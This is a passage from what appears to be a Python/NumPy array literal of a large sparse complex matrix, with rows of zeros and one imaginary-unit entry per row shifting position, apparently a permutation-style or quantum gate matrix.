0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
